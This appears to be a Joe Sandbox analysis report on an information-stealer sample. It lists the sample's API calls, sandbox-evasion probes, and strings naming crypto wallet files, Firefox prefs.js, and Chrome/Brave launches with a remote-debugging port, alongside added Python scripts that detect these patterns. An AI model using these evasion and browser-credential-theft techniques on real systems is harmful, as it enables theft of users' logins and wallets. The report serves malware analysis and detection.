                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C810B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00C810F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     Joe Sandbox IDA Plugin
                                     • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: eb75e8afe980fb891a798076a42edb192aa98a8cfa185d64a7dc418007cb5ce7
                                    • Instruction ID: e26e04dbae7b1901c81ff910f6e0e920653b64fa94eff94bd3029739c3c4286b
                                    • Opcode Fuzzy Hash: eb75e8afe980fb891a798076a42edb192aa98a8cfa185d64a7dc418007cb5ce7
                                    • Instruction Fuzzy Hash: 9FF0A7B1641318BBEB14AAB4AC59FAFB7DCE705B05F300448FA04E7281D6719F04DBA4
                                    APIs
                                      • Part of subcall function 00C97A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C97AA0
                                      • Part of subcall function 00C97A70: RtlAllocateHeap.NTDLL(00000000), ref: 00C97AA7
                                      • Part of subcall function 00C97A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00C97ABF
                                      • Part of subcall function 00C979E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C811B7), ref: 00C97A10
                                      • Part of subcall function 00C979E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C97A17
                                      • Part of subcall function 00C979E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C97A2F
                                    • ExitProcess.KERNEL32 ref: 00C811C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     Joe Sandbox IDA Plugin
                                     • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: e837cc47181dae47c1d070dc8f866ff36bf9e7604444f12d4c44953e70e52372
                                    • Instruction ID: 455610a0d4df5aade0cf2ca6b910dd3bd6db82fa22571c488ce7cd60206c4e56
                                    • Opcode Fuzzy Hash: e837cc47181dae47c1d070dc8f866ff36bf9e7604444f12d4c44953e70e52372
                                    • Instruction Fuzzy Hash: 9AE0E2A591830953CE1073B8BC0EB2A32CC5B1560FF090814FA18D3142EE25E906A2A9
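The three function entries above share the shape of cheap anti-analysis probes: VirtualAllocExNuma in a function that ends in ExitProcess (emulators that do not implement the NUMA allocator return NULL), a VirtualAlloc of 0x17C841C0 bytes, which is exactly 399,000,000 bytes, committed with MEM_COMMIT|MEM_RESERVE and PAGE_READWRITE and then handed to VirtualFree with MEM_RELEASE (a check that the machine has more RAM than a small analysis VM), and GetComputerNameA/GetUserNameA into 0x104-byte (MAX_PATH) heap buffers feeding a caller that also ends in ExitProcess (consistent with a hostname/username blocklist, though the listing alone does not show the compared values). One caveat when reading these entries: the values the IDA plugin prints are stack contents at the moment of the call, so the five values on the GetCurrentProcess line, which takes no parameters, read as the arguments already pushed for the following VirtualAllocExNuma call (lpAddress 0, dwSize 0x7D0, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE, nndPreferred 0). The script below is an added example written for this report, not Joe Sandbox code and not part of the sample: it parses entries in the listing format shown above, names the VirtualAlloc arguments, and flags the three patterns. The sample lines are copied from the entries above and concatenated into one sequence; the 256 MiB threshold and the four-call look-ahead window are the editor's own choices.

```python
import re

# Entries copied from the "APIs" listings of the three function blocks above
# (VirtualAllocExNuma, VirtualAlloc/VirtualFree, GetComputerNameA/GetUserNameA),
# concatenated here into one call sequence for the demonstration.
SAMPLE_API_LINES = [
    "• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C8112B",
    "• VirtualAllocExNuma.KERNEL32(00000000), ref: 00C81132",
    "• ExitProcess.KERNEL32 ref: 00C81143",
    "• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C810B3",
    "• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00C810F7",
    "• GetComputerNameA.KERNEL32(?,00000104), ref: 00C97ABF",
    "• GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C97A2F",
    "• ExitProcess.KERNEL32 ref: 00C811C6",
]

MEM_COMMIT, MEM_RESERVE, MEM_RELEASE = 0x1000, 0x2000, 0x8000
PAGE_NAMES = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}
# Threshold is the editor's choice: analysis VMs are often given little RAM, so a
# commit this large is a cheap "is this a real machine" probe.
LARGE_ALLOC_BYTES = 256 * 1024 * 1024

API_RE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_api_line(line):
    """One listing entry -> {name, module, args, ref}; unresolved args ('?', strings) become None."""
    m = API_RE.match(line)
    if not m:
        return None
    args = []
    for tok in (m.group("args") or "").split(","):
        tok = tok.strip()
        if not tok:
            continue
        args.append(int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None)
    return {"name": m.group("name"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def decode_virtual_alloc(args):
    """Name the VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect) arguments."""
    addr, size, alloc_type, protect = (list(args) + [None] * 4)[:4]
    return {
        "address": addr,
        "size": size,
        "commit": bool(alloc_type is not None and alloc_type & MEM_COMMIT),
        "reserve": bool(alloc_type is not None and alloc_type & MEM_RESERVE),
        "protect": PAGE_NAMES.get(protect, "?" if protect is None else hex(protect)),
    }


def evasion_findings(lines, window=4):
    """Flag call patterns matching the three evasion shapes seen in this report."""
    calls = [c for c in map(parse_api_line, lines) if c]
    findings = []
    for i, call in enumerate(calls):
        upcoming = calls[i + 1:i + 1 + window]
        names = [c["name"] for c in upcoming]
        if call["name"] == "VirtualAlloc" and len(call["args"]) >= 4:
            size = call["args"][1]
            released = any(c["name"] == "VirtualFree" and len(c["args"]) >= 3
                           and c["args"][1] == size and c["args"][2] is not None
                           and c["args"][2] & MEM_RELEASE for c in upcoming)
            if size is not None and size >= LARGE_ALLOC_BYTES and released:
                findings.append(f"large_alloc_probe: {size} bytes ({size >> 20} MiB) "
                                f"committed then released, ref {call['ref']:08X}")
        if call["name"] == "VirtualAllocExNuma" and "ExitProcess" in names:
            findings.append("numa_api_probe: VirtualAllocExNuma result gates ExitProcess, "
                            f"ref {call['ref']:08X}")
        if call["name"] in ("GetComputerNameA", "GetUserNameA") and "ExitProcess" in names:
            findings.append(f"host_identity_probe: {call['name']} precedes ExitProcess, "
                            f"ref {call['ref']:08X}")
    return findings


if __name__ == "__main__":
    for finding in evasion_findings(SAMPLE_API_LINES):
        print(finding)
```

Because the sequence is assembled from separate function entries, the look-ahead window is a heuristic, not a control-flow proof; confirm each finding against the disassembly at the printed ref before treating it as a sandbox check.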
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00CA0B32,00CA0B2F,00000000,?,?,?,00CA1450,00CA0B2E), ref: 00C8BEC5
                                    • StrCmpCA.SHLWAPI(?,00CA1454), ref: 00C8BF33
                                    • StrCmpCA.SHLWAPI(?,00CA1458), ref: 00C8BF49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C8C8A9
                                    • FindClose.KERNEL32(000000FF), ref: 00C8C8BB
                                    Strings
                                    • Google Chrome, xrefs: 00C8C6F8
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 00C8C534
                                    • \Brave\Preferences, xrefs: 00C8C1C1
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 00C8C3B2
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 00C8C495
                                    • Preferences, xrefs: 00C8C104
                                    • Brave, xrefs: 00C8C0E8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     Joe Sandbox IDA Plugin
                                     • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-1869280968
                                    • Opcode ID: 47b591bcffcc1b1d187e617cafc2dd08990a4512c9de5c8d7b14be9f4721e3a9
                                    • Instruction ID: a8fe79d155db439121bbaec6099b18a30880d4361501b576c0d1337a2f09c891
                                    • Opcode Fuzzy Hash: 47b591bcffcc1b1d187e617cafc2dd08990a4512c9de5c8d7b14be9f4721e3a9
                                    • Instruction Fuzzy Hash: AE5213725102089BCF14FB70DD9AEEE737DAF54305F404598B50AA6091EE34AB48EFE6
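The strings in this function (`Google Chrome`, `Brave`, `\Brave\Preferences`, and three references to `--remote-debugging-port=9229 --profile-directory="`), together with the FindFirstFileA/FindNextFileA walk over profile directories, are consistent with the sample starting the victim's own browser with the DevTools remote debugging port enabled and reading cookies and saved logins through the debugging protocol instead of decrypting the on-disk stores. The report shows the strings; that reading of the behaviour, and the detection below, are the editor's. The script is an added example, not Joe Sandbox code and not part of the sample: it scans constructed process-creation records for a Chromium-family browser started with `--remote-debugging-port` and rates each launch by its parent process and by whether the real profile or a scratch `--user-data-dir` was used. The record layout, the file paths, and the browser and parent allowlists are constructed for the example; the port number is deliberately not part of the match, since 9229 is just what this build uses.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation records (not taken from this report's process
# log); the "Key=Value|Key=Value" layout is this example's own convention.
SAMPLE_EVENTS = [
    # The launch shape the strings above describe: the analysed file.exe starting Chrome
    # on the user's real profile with DevTools remote debugging enabled.
    'Image=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'
    '|ParentImage=C:\\Users\\user\\Desktop\\file.exe'
    '|CommandLine="C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" '
    '--remote-debugging-port=9229 --profile-directory="Default"',
    # Same for Brave.
    'Image=C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\brave.exe'
    '|ParentImage=C:\\Users\\user\\Desktop\\file.exe'
    '|CommandLine="C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\brave.exe" '
    '--remote-debugging-port=9229 --profile-directory="Default"',
    # Ordinary user launch from the shell: no debugging port, nothing to report.
    'Image=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'
    '|ParentImage=C:\\Windows\\explorer.exe'
    '|CommandLine="C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" https://example.org/',
    # Developer tooling: same flag, but a throwaway --user-data-dir, so the real cookies
    # are not exposed; reported at lower severity.
    'Image=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'
    '|ParentImage=C:\\Users\\user\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'
    '|CommandLine="C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" '
    '--remote-debugging-port=9222 --user-data-dir=C:\\tmp\\devprofile',
]

CHROMIUM_BROWSERS = {"chrome.exe", "brave.exe", "msedge.exe", "opera.exe", "vivaldi.exe"}
# Parents that start a browser in normal use (assumption; extend per environment).
EXPECTED_PARENTS = {"explorer.exe"} | CHROMIUM_BROWSERS
PORT_RE = re.compile(r"--remote-debugging-port=(\d+)")
PROFILE_RE = re.compile(r'--profile-directory="?([^"\s]+)"?')


def parse_event(record):
    """'Key=Value|Key=Value' -> dict; only the first '=' of each part separates key from value."""
    return dict(part.split("=", 1) for part in record.split("|"))


def classify_launch(event):
    """Return a finding for a Chromium-family browser started with a debugging port, else None."""
    image = ntpath.basename(event.get("Image", "")).lower()
    cmdline = event.get("CommandLine", "")
    port = PORT_RE.search(cmdline)
    if image not in CHROMIUM_BROWSERS or not port:
        return None
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    profile = PROFILE_RE.search(cmdline)
    scratch_profile = "--user-data-dir" in cmdline
    # The credential-theft shape: an unexpected parent attaches a debugging port to the
    # user's real profile. Everything else with the flag is still worth a look.
    severity = "high" if parent not in EXPECTED_PARENTS and not scratch_profile else "medium"
    return {"image": image, "parent": parent, "port": int(port.group(1)),
            "profile": profile.group(1) if profile else None, "severity": severity}


def detect_remote_debug_launch(records):
    """Run the classifier over raw records and keep the hits in input order."""
    return [hit for hit in (classify_launch(parse_event(r)) for r in records) if hit]


if __name__ == "__main__":
    for hit in detect_remote_debug_launch(SAMPLE_EVENTS):
        print(hit)
```

In a real deployment the same logic maps onto Sysmon Event ID 1 or EDR process-start telemetry; the fields to keep are the image, parent image and full command line, and a follow-up pivot is any outbound TCP connection on the loopback interface to the port seen in the command line from a process other than the browser.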
                                    APIs
                                    • wsprintfA.USER32 ref: 00C93B1C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C93B33
                                    • lstrcat.KERNEL32(?,?), ref: 00C93B85
                                    • StrCmpCA.SHLWAPI(?,00CA0F58), ref: 00C93B97
                                    • StrCmpCA.SHLWAPI(?,00CA0F5C), ref: 00C93BAD
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C93EB7
                                    • FindClose.KERNEL32(000000FF), ref: 00C93ECC
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     Joe Sandbox IDA Plugin
                                     • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: 2be6e6f3c667312d1815f7d61b4f0931f597f69ea6f52574cb35d8fd2774d212
                                    • Instruction ID: f5cebf70c3bcf8438d86de967baf63442213ff34c48e50f85c858d0432ecd15d
                                    • Opcode Fuzzy Hash: 2be6e6f3c667312d1815f7d61b4f0931f597f69ea6f52574cb35d8fd2774d212
                                    • Instruction Fuzzy Hash: 14A14072A0034C9BDF24EFA4DC89FEA7378BB49705F044598B61D96181EB709B88DF61
                                    APIs
                                    • wsprintfA.USER32 ref: 00C94B7C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C94B93
                                    • StrCmpCA.SHLWAPI(?,00CA0FC4), ref: 00C94BC1
                                    • StrCmpCA.SHLWAPI(?,00CA0FC8), ref: 00C94BD7
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C94DCD
                                    • FindClose.KERNEL32(000000FF), ref: 00C94DE2
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     Joe Sandbox IDA Plugin
                                     • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: 8f02edc58b620fd479cd5862c19d42133a6e162f957d796b04dce122bd23327c
                                    • Instruction ID: 616fc84013461cb21b058a89d70351ed8654ab3cf1c0c4650dd3d3da2e7c0fca
                                    • Opcode Fuzzy Hash: 8f02edc58b620fd479cd5862c19d42133a6e162f957d796b04dce122bd23327c
                                    • Instruction Fuzzy Hash: 5D614572904319ABCF24FBA0EC49EEA737CBB49705F044598B60996190EB70AB85DF91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C947D0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C947D7
                                    • wsprintfA.USER32 ref: 00C947F6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C9480D
                                    • StrCmpCA.SHLWAPI(?,00CA0FAC), ref: 00C9483B
                                    • StrCmpCA.SHLWAPI(?,00CA0FB0), ref: 00C94851
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C948DB
                                    • FindClose.KERNEL32(000000FF), ref: 00C948F0
                                    • lstrcat.KERNEL32(?,0152E3A0), ref: 00C94915
                                    • lstrcat.KERNEL32(?,0152D118), ref: 00C94928
                                    • lstrlen.KERNEL32(?), ref: 00C94935
                                    • lstrlen.KERNEL32(?), ref: 00C94946
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     Joe Sandbox IDA Plugin
                                     • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: 636bafee1a568bf2b8bd107ff76b184a5b5d2b1f91d87447eeffe47158a29b1b
                                    • Instruction ID: 1bc8ff7c67f79b63a1e7c470ab13e52128d5447381d875f6518964eb3edb923c
                                    • Opcode Fuzzy Hash: 636bafee1a568bf2b8bd107ff76b184a5b5d2b1f91d87447eeffe47158a29b1b
                                    • Instruction Fuzzy Hash: 5C5132B150431CABCB24FBB0EC89FE9737CAB58305F404598B65996190EB709B89DF91
                                    APIs
                                    • wsprintfA.USER32 ref: 00C94113
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C9412A
                                    • StrCmpCA.SHLWAPI(?,00CA0F94), ref: 00C94158
                                    • StrCmpCA.SHLWAPI(?,00CA0F98), ref: 00C9416E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C942BC
                                    • FindClose.KERNEL32(000000FF), ref: 00C942D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: ea4b4f19ff79b8211240845f8f102ff7ef15da6f01cead9aef6c7523f185f111
                                    • Instruction ID: 6e9e28dd58b11ad228912aa5e9fdc71681a702d49613af53290c9e9e4183e7f9
                                    • Opcode Fuzzy Hash: ea4b4f19ff79b8211240845f8f102ff7ef15da6f01cead9aef6c7523f185f111
                                    • Instruction Fuzzy Hash: 1A5166B1904318ABCF24FBB0DC89EEE737CBB58305F0445D8B61996050EB70AB899F94
                                    APIs
                                    • wsprintfA.USER32 ref: 00C8EE3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C8EE55
                                    • StrCmpCA.SHLWAPI(?,00CA1630), ref: 00C8EEAB
                                    • StrCmpCA.SHLWAPI(?,00CA1634), ref: 00C8EEC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C8F3AE
                                    • FindClose.KERNEL32(000000FF), ref: 00C8F3C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: b86da608b2eec107e75900c6e5f4cf4c130ea0d2c3bbd51b4def4d5d42f7dd9c
                                    • Instruction ID: 3bcd545031feec31253e19da7e2cca83f0f139069694e9f6e8ce71dae097ba41
                                    • Opcode Fuzzy Hash: b86da608b2eec107e75900c6e5f4cf4c130ea0d2c3bbd51b4def4d5d42f7dd9c
                                    • Instruction Fuzzy Hash: 07E10D729112189BDF14FB60DCAAEEE733DAF54300F4045E9B50A62092EF306B89DF95
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                    • API String ID: 0-1562099544
                                    • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction ID: e27ec7e3633110fd36781ba912bc5d3bec9539f4b21ecf84dad195317a9773c4
                                    • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction Fuzzy Hash: 98E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CA16B0,00CA0D97), ref: 00C8F81E
                                    • StrCmpCA.SHLWAPI(?,00CA16B4), ref: 00C8F86F
                                    • StrCmpCA.SHLWAPI(?,00CA16B8), ref: 00C8F885
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C8FBB1
                                    • FindClose.KERNEL32(000000FF), ref: 00C8FBC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
